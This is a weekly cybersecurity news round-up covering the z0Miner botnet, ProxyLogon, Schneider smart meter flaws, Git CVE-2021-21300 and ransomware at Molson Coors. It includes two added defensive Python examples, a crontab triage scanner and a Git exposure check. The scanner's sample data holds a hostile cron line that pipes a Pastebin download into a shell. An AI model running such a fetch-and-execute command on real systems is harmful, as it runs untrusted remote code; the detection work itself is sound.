Here is our cyber security news round-up of the week:
Crypto-mining botnet targets unpatched vulnerabilities in cloud servers
Attackers keep upgrading their tools to scan for and infect new devices by exploiting unpatched vulnerabilities. Recently, the z0Miner cryptomining malware was spotted probing cloud servers through a new set of unpatched vulnerabilities. The botnet was using exploits for an Elasticsearch RCE vulnerability (CVE-2015-1427) and an older RCE affecting Jenkins servers.
After compromising a server, the malware first downloads a malicious shell script and sets up a new cron entry to periodically fetch and execute further malicious scripts from Pastebin. The botnet then downloads a mining kit containing an XMRig miner script (java.exe), a config file (config.json) and a starter script (solr.sh), and starts mining Monero (XMR) cryptocurrency in the background.
According to the Tencent Security Team, z0Miner was actively exploiting two Weblogic pre-auth RCE bugs tracked as CVE-2020-14882 and CVE-2020-14883 to spread to other devices. In addition, the botnet was seen spreading laterally on the network of already compromised devices via SSH.
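As an added example (not code from the original post or from any z0Miner analysis), a small Python scanner that reads a user crontab and flags entries matching the persistence pattern described above: a cron job that fetches a script from Pastebin and pipes it into a shell, or that references the mining-kit file names. The crontab lines are constructed, and the Pastebin paste ID is a placeholder.

```python
import re
from typing import Dict, List

# Constructed sample crontab: one benign entry, one in the pattern described above.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -fsSL https://pastebin.com/raw/EXAMPLEID | sh
"""

FETCHER = re.compile(r"\b(curl|wget)\b")
PASTE_HOST = re.compile(r"https?://(www\.)?pastebin\.com/", re.IGNORECASE)
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")
# Mining-kit file names quoted in the write-up above.
KIT_FILES = ("solr.sh", "java.exe", "config.json")


def parse_crontab(text: str) -> List[Dict[str, str]]:
    """Split a user crontab into schedule/command pairs, skipping comments and blanks."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue  # comment, blank, or VAR=value environment line
        if line.startswith("@"):               # @hourly, @reboot, ...
            schedule, _, command = line.partition(" ")
        else:
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue                       # malformed five-field line
            schedule, command = " ".join(parts[:5]), parts[5]
        entries.append({"schedule": schedule, "command": command.strip()})
    return entries


def suspicious_reasons(command: str) -> List[str]:
    """Explain why a command matches; an empty list means nothing matched."""
    reasons = []
    if FETCHER.search(command) and PASTE_HOST.search(command):
        reasons.append("fetches a script from pastebin")
    if PIPE_TO_SHELL.search(command):
        reasons.append("pipes downloaded content into a shell")
    reasons += [f"references mining-kit file {n}" for n in KIT_FILES if n in command]
    return reasons


def scan_crontab(text: str) -> List[Dict[str, object]]:
    """Return every entry with at least one indicator, together with the reasons."""
    hits = []
    for entry in parse_crontab(text):
        reasons = suspicious_reasons(entry["command"])
        if reasons:
            hits.append({**entry, "reasons": reasons})
    return hits
```

Run it over the output of `crontab -l` for each account (and over /etc/cron.d) to get a first triage list; the reasons are indicators, not proof, so confirm each hit by hand.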
Continued exploitation of Microsoft Exchange Servers
A bug referred to as ProxyLogon was one of four Microsoft Exchange zero-days that Microsoft patched in an out-of-band release on 3 March 2021. It is part of the Hafnium attack, and sysadmins are advised, per Microsoft's guidance, to upgrade on-prem and hosted Exchange deployments and also to run Microsoft Safety Scanner, Microsoft's malware discovery tool.
Since Microsoft disclosed ongoing attacks using ProxyLogon exploits last week, at least ten APT groups have been spotted by Slovak internet security firm ESET targeting unpatched Exchange servers. They also detected the deployment of PowerShell downloaders on multiple email servers via attack infrastructure previously linked to the DLTMiner coin-mining campaign.
A (mostly) working ProxyLogon proof-of-concept exploit was shared earlier this week (and later removed) by a security researcher. According to Palo Alto Networks' telemetry data, more than 125,000 Exchange Servers worldwide remain unpatched. Tens of thousands of organisations have already been compromised in ongoing attacks exploiting the ProxyLogon flaws since at least January, two months before Microsoft started releasing patches. These vulnerabilities are tracked as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
Schneider PowerLogic smart meters vulnerable
Industrial cybersecurity firm Claroty this week disclosed technical details for two potentially serious vulnerabilities affecting PowerLogic smart meters made by Schneider Electric. PowerLogic is a line of revenue and power quality meters that are used not only by utilities, but also industrial companies, healthcare organisations and data centers for monitoring electrical networks. Researchers at Claroty discovered that some of the PowerLogic ION and PM series smart meters are affected by vulnerabilities that can be exploited remotely by an unauthenticated attacker by sending specially crafted TCP packets to the targeted device.
“These smart meters communicate using a proprietary ION protocol over TCP port 7700, and packets received by the device are parsed by a state machine function,” Claroty explained in a blog post. “We found that it is possible to trigger the flaw during the packet-parsing process by the main state machine function by sending a crafted request. This can be done without authentication because the request is fully parsed before it is handled or authentication is checked.”
Claroty said its researchers identified two different exploitation paths – depending on the architecture of the targeted device – and two different CVE identifiers have been assigned. One of them, CVE-2021-22714, is considered critical as it allows an attacker to cause the targeted meter to reboot (i.e. DoS condition) and possibly even to execute arbitrary code. The other one, CVE-2021-22713, can only be exploited to force the device to reboot and it has been assigned a high severity rating. Users of the affected Schneider Electric products should apply the patches or mitigations to prevent potential attacks, particularly since information about the flaws has been made public.
Git vulnerability could enable remote code execution attacks during clone process
The Git Project has patched a vulnerability that could result in remote code execution. The bug, tracked as CVE-2021-21300, is present in several versions of the open source version control system and could allow a hostile remote repository to execute code locally during a clone operation. Crucially, the vulnerability only affects users on case-insensitive filesystems with support for symbolic links enabled. A clean/smudge filter such as Git LFS must also be in use for the attack to work.
A security advisory reads: “In affected versions of Git, a specially crafted repository that contains symbolic links as well as files using a clean/smudge filter such as Git LFS, may cause just-checked-out script to be executed while cloning onto a case-insensitive file system such as NTFS, HFS+ or APFS (i.e. the default file systems on Windows and macOS).”
The release fixes the bug in versions 2.17.6 through 2.30.2. Git users often clone an existing repository for various reasons, such as building on a fully-fledged copy from elsewhere or keeping a copy of their project in case the server disk is corrupted. Since the RCE vulnerability only affects case-insensitive filesystems, not all Git users are vulnerable to exploitation. Other operating systems such as Linux, which is case-sensitive by default, are presumed to be safe; however, users should still exercise caution.
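As an added example (not code from the Git project or from the original post), a small Python check that takes `git config --list` output and a `git --version` string and reports whether the preconditions above still hold together: an unpatched Git, symbolic-link support, a clean/smudge filter, and a case-insensitive filesystem. The fix-release table contains only the two versions the post names (extend it from the Git advisory for the other release lines), and the sample config is constructed.

```python
import re
from typing import Dict, Tuple

# Fix releases named in the post, keyed by release line. Assumption: extend this table
# from the Git advisory for the other maintained lines between 2.17 and 2.30.
FIXED_PATCH = {(2, 17): 6, (2, 30): 2}

# Constructed sample: Git LFS filters configured and symlink support left on.
SAMPLE_CONFIG = """\
core.symlinks=true
filter.lfs.clean=git-lfs clean -- %f
filter.lfs.smudge=git-lfs smudge -- %f
"""

def parse_version(text: str) -> Tuple[int, int, int]:
    """Accept 'git version 2.30.1' or a bare '2.30.1'; return (major, minor, patch)."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if not m:
        raise ValueError(f"unrecognised git version: {text!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return major, minor, patch

def is_patched(version: Tuple[int, int, int]) -> bool:
    """Newer than 2.30 post-dates the fix; a line missing from the table counts as unpatched."""
    major, minor, patch = version
    if (major, minor) > (2, 30):
        return True
    fixed = FIXED_PATCH.get((major, minor))
    return fixed is not None and patch >= fixed

def parse_config(text: str) -> Dict[str, str]:
    """Turn `git config --list` output (key=value per line) into a dict; last value wins."""
    config: Dict[str, str] = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            config[key.strip().lower()] = value.strip()
    return config

def exposure(config_text: str, version_text: str, case_insensitive_fs: bool) -> Dict[str, object]:
    """Combine the preconditions; 'exposed' is true only when every one of them holds."""
    cfg = parse_config(config_text)
    filters = sorted({k.split(".")[1] for k in cfg
                      if k.startswith("filter.") and k.endswith((".clean", ".smudge"))})
    # core.symlinks defaults to true when unset (git clone may probe and set it per repo).
    symlinks = cfg.get("core.symlinks", "true").lower() != "false"
    patched = is_patched(parse_version(version_text))
    return {"patched": patched, "symlinks": symlinks, "filters": filters,
            "exposed": not patched and symlinks and bool(filters) and case_insensitive_fs}
```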
Molson Coors Brewery crippled by cyber attack
A cyber attack on Molson Coors' US breweries has left the company unable to produce beer for the time being. Molson Coors has a huge portfolio of beer brands, including the well-known Coors and Miller brands, but also Molson Canadian, Blue Moon, Peroni, Grolsch, Killian’s and Foster’s. Molson Coors representatives gave only a few details, but cybersecurity experts say this type of attack is becoming all too familiar. The company acknowledges “a systems outage” caused by a “cybersecurity incident” that has delayed or disrupted brewery operations, production and shipments.
“The Company is working around the clock to get its systems back up as quickly as possible,” Miller Coors wrote in the filing. “Although the Company is actively managing this cybersecurity incident, it has caused and may continue to cause a delay or disruption to parts of the Company’s business, including its brewery operations, production, and shipments.”
So far, the attack appears to be ransomware. Cybersecurity experts are urging companies to back up their data to physical hard drives so that, when an incident of this type occurs, they are not left at the mercy of ransomware.
Google fixes the third actively exploited Chrome zero-day since January
Google has fixed a new zero-day flaw in its Chrome browser that is being actively exploited in the wild, the second such fix within a month. The flaw, tracked as CVE-2021-21193, is a use-after-free vulnerability in the Blink rendering engine. Google addressed the issue in version 89.0.4389.90 for Windows, Mac and Linux, which will roll out over the coming days. The flaw was reported to Google by an anonymous researcher on 9 March; at the time of writing, the company had not released details of the vulnerability, to avoid helping other threat actors exploit it in the wild.
Edited and compiled by QA's Director of Cyber, Richard Beck.
Richard Beck is Director of Cyber at QA. He works with customers to build effective and successful learning solutions tailored to business needs, helping to solve business problems. Richard has designed and architected numerous enterprise and nationwide cyber programmes for QA customers. He is responsible for the QA cyber portfolio, products, proposition and cyber partner community, and has over 15 years' experience in senior Information Security roles.
Prior to QA, Richard was Head of Information Security for an organisation that underpins 20% of the UK's Critical National Infrastructure. Richard also held Security and Technical Management posts in Defence, Financial Services and HMG. He holds a number of leading cyber professional certifications, including CISSP, CISM and CISA.
Richard sits on a number of industry boards and security advisory panels, and previously chaired the Communication Industry Personnel Security Information Exchange (CPNI). He is the work stream lead for Cyber Skills & Diversity on the techUK Cyber Management Committee, and is also supporting a work stream for the UK Cyber Security Council Formation project. Richard is a regular contributor of cyber insights and to industry collaboration, including speaking engagements.
He is also a STEM Ambassador working to engage and enthuse young people in the area of cyber security, providing a unique perspective on the world of cyber security to teachers and encouraging young people to consider a career in the field.